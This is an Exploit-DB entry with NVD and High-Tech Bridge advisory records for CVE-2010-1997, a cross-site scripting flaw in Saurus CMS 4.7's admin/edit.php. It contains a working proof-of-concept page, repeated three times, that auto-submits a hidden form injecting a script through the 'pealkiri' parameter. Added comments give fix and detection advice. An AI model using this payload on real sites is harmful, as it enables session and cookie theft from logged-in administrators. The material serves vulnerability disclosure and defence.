ID EDB-ID:33976
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2010-05-11T00:00:00
Description
Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability. CVE-2010-1997. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/40059/info
Saurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input, specifically the "pealkiri" HTTP POST parameter of /admin/edit.php.
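An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. According to the CVE and advisory records reproduced below, successful exploitation requires that the victim is logged in and has "Article list" edit privileges.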
Saurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected.
<!--
  Proof-of-concept from the advisory for CVE-2010-1997 (Saurus CMS 4.7.0).
  A form made only of hidden fields posts to admin/edit.php; the host
  www.example.com is a documentation placeholder. The script block after
  the form submits it as soon as the page is loaded, so the request is
  issued by the browser that renders this page.
  NOTE(review): the records on this page state the victim must be logged in
  with "Article list" edit privileges. That the request is accepted when it
  originates from another site suggests edit.php did not check an anti-CSRF
  token; this is inferred from the PoC and is not stated in the advisory.
  Defensive reading: the fix belongs in the application. Encode the
  pealkiri value for the HTML context where it is rendered, and require a
  per-session token on state-changing POSTs to admin/edit.php.
-->
<form action="http://www.example.com/admin/edit.php" name="editForm" method="POST" enctype="multipart/form-data">
<!-- Operation selectors: tab=object with op=new. Presumably these select the
     "create object" action of the editor; confirm against the CMS source. -->
<input type="hidden" name="tab" value="object" />
<input type="hidden" name="op" value="new" />
<input type="hidden" name="op2" value="" />
<input type="hidden" name="refresh" value="0" />
<input type="hidden" name="tyyp_id" value="1" />
<input type="hidden" name="tyyp" value="rubriik" />
<input type="hidden" name="pearubriik" value="0" />
<!-- The numeric ids below look specific to the reporter's test installation;
     they are reproduced as published. -->
<input type="hidden" name="id" value="27746" />
<input type="hidden" name="parent_id" value="27270" />
<input type="hidden" name="previous_id" value="" />
<input type="hidden" name="keel" value="1" />
<input type="hidden" name="on_pealkiri" value="1" />
<input type="hidden" name="sorting" value="">
<input type="hidden" name="extension_path" value="" />
<input type="hidden" name="opener_location" value="" />
<input type="hidden" name="publish" value="1" />
<input name="permanent_parent_id" type="hidden" value="27270" />
<input name="sys_alias" type="hidden" value="" />
<input name="advanced_panel_state" type="hidden" value="0" />
<!-- pealkiri is the parameter the CVE record names as vulnerable (the word
     appears to be Estonian for "title"). The value first terminates the
     attribute and tag it is expected to be echoed into, then supplies a
     script element; the alert of document.cookie is a harmless marker
     showing that script runs in the site's origin. -->
<input type="hidden" name="pealkiri" value='"><script>alert(document.cookie)</script>' />
<!-- friendly_url holds the same text with all punctuation removed;
     presumably the URL slug the editor derives from the title. -->
<input type="hidden" name="friendly_url" value="scriptalertdocumentcookiescript" />
<input type="hidden" name="ttyyp_id" value="0" />
<!-- publish is sent a second time here (it already appears above); the
     duplicate is part of the published PoC. -->
<input type="hidden" name="publish" value="1" />
<input type="hidden" name="rubriik[]" value="27270">
<input type="hidden" name="page_ttyyp_id" value="0" />
<input type="hidden" name="on_meilinglist" value="1" />
<input type="hidden" name="avaldamise_algus" value="" />
<input type="hidden" name="avaldamise_lopp" value="" />
<input type="hidden" name="kesk" value="0" />
</form>
<!-- Auto-submit: no click is needed once the page is rendered. For detection,
     a POST to admin/edit.php whose Origin or Referer is a foreign site, or
     whose pealkiri value contains markup characters, is worth alerting on. -->
<script>
document.editForm.submit();
</script>
{"id": "EDB-ID:33976", "hash": "0ab2b53b0c86ada4a09abbb93bf8d27a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting Vulnerability", "description": "Saurus CMS 4.7 'edit.php' Cross Site Scripting Vulnerability. CVE-2010-1997. Webapps exploit for php platform", "published": "2010-05-11T00:00:00", "modified": "2010-05-11T00:00:00", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33976/", "reporter": "High-Tech Bridge SA", "references": [], "cvelist": ["CVE-2010-1997"], "lastseen": "2016-02-03T20:14:08", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2016-02-03T20:14:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1997"]}, {"type": "htbridge", "idList": ["HTB22361"]}], "modified": "2016-02-03T20:14:08"}, "vulnersScore": 4.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33976/", "sourceData": "source: http://www.securityfocus.com/bid/40059/info\r\n\r\nSaurus CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\r\n\r\nSaurus CMS 4.7.0 Community Edition is vulnerable; other versions may also be affected. 
\r\n\r\n<form action=\"http://www.example.com/admin/edit.php\" name=\"editForm\" method=\"POST\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"tab\" value=\"object\" />\r\n<input type=\"hidden\" name=\"op\" value=\"new\" />\r\n<input type=\"hidden\" name=\"op2\" value=\"\" />\r\n<input type=\"hidden\" name=\"refresh\" value=\"0\" />\r\n<input type=\"hidden\" name=\"tyyp_id\" value=\"1\" />\r\n<input type=\"hidden\" name=\"tyyp\" value=\"rubriik\" />\r\n<input type=\"hidden\" name=\"pearubriik\" value=\"0\" />\r\n<input type=\"hidden\" name=\"id\" value=\"27746\" />\r\n<input type=\"hidden\" name=\"parent_id\" value=\"27270\" />\r\n<input type=\"hidden\" name=\"previous_id\" value=\"\" />\r\n<input type=\"hidden\" name=\"keel\" value=\"1\" />\r\n<input type=\"hidden\" name=\"on_pealkiri\" value=\"1\" />\r\n<input type=\"hidden\" name=\"sorting\" value=\"\">\r\n<input type=\"hidden\" name=\"extension_path\" value=\"\" />\r\n<input type=\"hidden\" name=\"opener_location\" value=\"\" />\r\n<input type=\"hidden\" name=\"publish\" value=\"1\" />\r\n<input name=\"permanent_parent_id\" type=\"hidden\" value=\"27270\" />\r\n<input name=\"sys_alias\" type=\"hidden\" value=\"\" />\r\n<input name=\"advanced_panel_state\" type=\"hidden\" value=\"0\" />\r\n<input type=\"hidden\" name=\"pealkiri\" value='\"><script>alert(document.cookie)</script>' />\r\n<input type=\"hidden\" name=\"friendly_url\" value=\"scriptalertdocumentcookiescript\" />\r\n<input type=\"hidden\" name=\"ttyyp_id\" value=\"0\" />\r\n<input type=\"hidden\" name=\"publish\" value=\"1\" />\r\n<input type=\"hidden\" name=\"rubriik[]\" value=\"27270\">\r\n<input type=\"hidden\" name=\"page_ttyyp_id\" value=\"0\" />\r\n<input type=\"hidden\" name=\"on_meilinglist\" value=\"1\" />\r\n<input type=\"hidden\" name=\"avaldamise_algus\" value=\"\" />\r\n<input type=\"hidden\" name=\"avaldamise_lopp\" value=\"\" />\r\n<input type=\"hidden\" name=\"kesk\" value=\"0\" 
/>\r\n</form>\r\n<script>\r\ndocument.editForm.submit();\r\n</script>\r\n\r\n\r\n", "osvdbidlist": ["64570"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:28", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in admin/edit.php in Saurus CMS 4.7.0 allows remote authenticated users, with \"Article list\" edit privileges, to inject arbitrary web script or HTML via the pealkiri parameter.", "modified": "2018-10-10T19:58:00", "id": "CVE-2010-1997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1997", "published": "2010-05-20T17:30:00", "title": "CVE-2010-1997", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:N/AC:H/Au:S/C:N/I:P/A:N"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:29", "bulletinFamily": "software", "description": "High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Saurus CMS which could be exploited to perform cross-site scripting (XSS) attacks. \n \n1) Cross-site scripting vulnerability in Saurus CMS: CVE-2010-1997 \nThe vulnerability exists due to insufficient input sanitation in the HTTP POST parameter \"pealkiri\" in /admin/edit.php. A remote attacker can create a specially crafted page and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged in and has \"Article list\" edit privileges. 
\nExploitation example: \n<form action=\"http://host/admin/edit.php\" name=\"editForm\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"tab\" value=\"object\" /> \n<input type=\"hidden\" name=\"op\" value=\"new\" /> \n<input type=\"hidden\" name=\"op2\" value=\"\" /> \n<input type=\"hidden\" name=\"refresh\" value=\"0\" /> \n<input type=\"hidden\" name=\"tyyp_id\" value=\"1\" /> \n<input type=\"hidden\" name=\"tyyp\" value=\"rubriik\" /> \n<input type=\"hidden\" name=\"pearubriik\" value=\"0\" /> \n<input type=\"hidden\" name=\"id\" value=\"27746\" /> \n<input type=\"hidden\" name=\"parent_id\" value=\"27270\" /> \n<input type=\"hidden\" name=\"previous_id\" value=\"\" /> \n<input type=\"hidden\" name=\"keel\" value=\"1\" /> \n<input type=\"hidden\" name=\"on_pealkiri\" value=\"1\" /> \n<input type=\"hidden\" name=\"sorting\" value=\"\"> \n<input type=\"hidden\" name=\"extension_path\" value=\"\" /> \n<input type=\"hidden\" name=\"opener_location\" value=\"\" /> \n<input type=\"hidden\" name=\"publish\" value=\"1\" /> \n<input name=\"permanent_parent_id\" type=\"hidden\" value=\"27270\" /> \n<input name=\"sys_alias\" type=\"hidden\" value=\"\" /> \n<input name=\"advanced_panel_state\" type=\"hidden\" value=\"0\" /> \n<input type=\"hidden\" name=\"pealkiri\" value='\"><script>alert(document.cookie)</script>' /> \n<input type=\"hidden\" name=\"friendly_url\" value=\"scriptalertdocumentcookiescript\" /> \n<input type=\"hidden\" name=\"ttyyp_id\" value=\"0\" /> \n<input type=\"hidden\" name=\"publish\" value=\"1\" /> \n<input type=\"hidden\" name=\"rubriik[]\" value=\"27270\"> \n<input type=\"hidden\" name=\"page_ttyyp_id\" value=\"0\" /> \n<input type=\"hidden\" name=\"on_meilinglist\" value=\"1\" /> \n<input type=\"hidden\" name=\"avaldamise_algus\" value=\"\" /> \n<input type=\"hidden\" name=\"avaldamise_lopp\" value=\"\" /> \n<input type=\"hidden\" name=\"kesk\" value=\"0\" /> \n</form> \n<script> \ndocument.editForm.submit(); 
\n</script>\n", "modified": "2010-04-27T00:00:00", "published": "2010-04-27T00:00:00", "id": "HTB22361", "href": "https://www.htbridge.com/advisory/HTB22361", "type": "htbridge", "title": "Cross-site Scripting (XSS) in Saurus CMS", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N/"}}]}